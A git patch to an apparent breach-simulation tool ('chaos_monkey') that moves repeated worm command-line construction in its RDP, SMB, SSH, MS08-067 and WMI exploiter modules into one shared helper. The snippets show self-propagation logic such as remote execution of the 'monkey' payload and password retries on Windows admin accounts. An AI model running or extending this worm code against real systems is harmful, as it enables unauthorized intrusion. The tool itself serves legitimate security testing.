From 76e3350fa38c785b48278976b9e6c282a911465a Mon Sep 17 00:00:00 2001 From: itsikkes Date: Tue, 26 Jul 2016 18:52:58 +0300 Subject: [PATCH] merge duplicate code --- chaos_monkey/exploit/rdpgrinder.py | 10 ++-------- chaos_monkey/exploit/smbexec.py | 10 ++-------- chaos_monkey/exploit/sshexec.py | 11 ++--------- chaos_monkey/exploit/tools.py | 20 +++++++++++++++++++- chaos_monkey/exploit/win_ms08_067.py | 11 +++-------- chaos_monkey/exploit/wmiexec.py | 10 ++-------- 6 files changed, 30 insertions(+), 42 deletions(-) diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py index ad803b326..abc9afe7b 100644 --- a/chaos_monkey/exploit/rdpgrinder.py +++ b/chaos_monkey/exploit/rdpgrinder.py @@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from model.host import VictimHost from network.tools import check_port_tcp from exploit.tools import get_target_monkey +from tools import build_monkey_commandline __author__ = 'hoffer' KEYS_INTERVAL = 0.1 @@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter): LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.") return False - cmdline = " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline = build_monkey_commandline(host, depth-1) if self._config.rdp_use_vbs_download: command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline} diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py index 3acc928d2..e4e33a0d9 100644 --- a/chaos_monkey/exploit/smbexec.py +++ b/chaos_monkey/exploit/smbexec.py @@ -6,6 +6,7 @@ from exploit import HostExploiter from network.tools import check_port_tcp from exploit.tools import SmbTools, get_target_monkey from network import SMBFinger +from tools import build_monkey_commandline try: from impacket import smb @@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter): else: cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path} - cmdline += " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline += build_monkey_commandline(host, depth-1) for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, )) diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py index d6fcf52b5..717fc9bae 100644 --- a/chaos_monkey/exploit/sshexec.py +++ b/chaos_monkey/exploit/sshexec.py @@ -1,6 +1,7 @@ import paramiko import monkeyfs import logging +from tools import build_monkey_commandline from exploit import HostExploiter from model import MONKEY_ARG from exploit.tools import get_target_monkey @@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter): def __init__(self): self._config = __import__('config').WormConfiguration - self._guid = __import__('config').GUID self._update_timestamp = 0 def log_transfer(self, transferred, total): @@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter): try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) - cmdline += " -p " + self._guid - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) - + cmdline += build_monkey_commandline(host, depth-1) cmdline += "&" ssh.exec_command(cmdline) diff --git a/chaos_monkey/exploit/tools.py b/chaos_monkey/exploit/tools.py index d9f365aa9..7654abb30 100644 --- a/chaos_monkey/exploit/tools.py +++ b/chaos_monkey/exploit/tools.py @@ -396,4 +396,22 @@ def get_target_monkey(host): host.os.get('machine','').lower() == platform.machine().lower(): monkey_path = sys.executable - return monkey_path \ No newline at end of file + return monkey_path + + +def build_monkey_commandline(target_host, depth): + from config import WormConfiguration, GUID + + cmdline = "" + cmdline += " -p " + GUID + + if target_host.default_tunnel: + cmdline += " -t " + target_host.default_tunnel + if target_host.default_server: + cmdline += " -s " + target_host.default_server + if depth < 0: + depth = 0 + + cmdline += " -d %d" % depth + + return cmdline diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 0c038a535..a7bdf2d47 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -17,6 +17,7 @@ from . import HostExploiter from exploit.tools import SmbTools, get_target_monkey from network.tools import check_port_tcp from network import SMBFinger +from tools import build_monkey_commandline try: from impacket import smb @@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter): self._config.ms08_067_remote_user_pass, src_path, self._config.dropper_target_path) + if not remote_full_path: # try other passwords for administrator for password in self._config.psexec_passwords: @@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter): else: cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} - cmdline += " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline += build_monkey_commandline(host, depth - 1) try: sock.send("start %s\r\n" % (cmdline, )) diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index 28dab01f3..86a34e5c5 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -2,6 +2,7 @@ import socket import ntpath import logging import traceback +from tools import build_monkey_commandline from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model.host import VictimHost from exploit import HostExploiter @@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter): else: cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} - cmdline += " -p " + self._guid - - if host.default_tunnel: - cmdline += " -t " + host.default_tunnel - if host.default_server: - cmdline += " -s " + host.default_server - if depth > 0: - cmdline += " -d %d" % (depth - 1) + cmdline += build_monkey_commandline(host, depth - 1) # execute the remote monkey result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,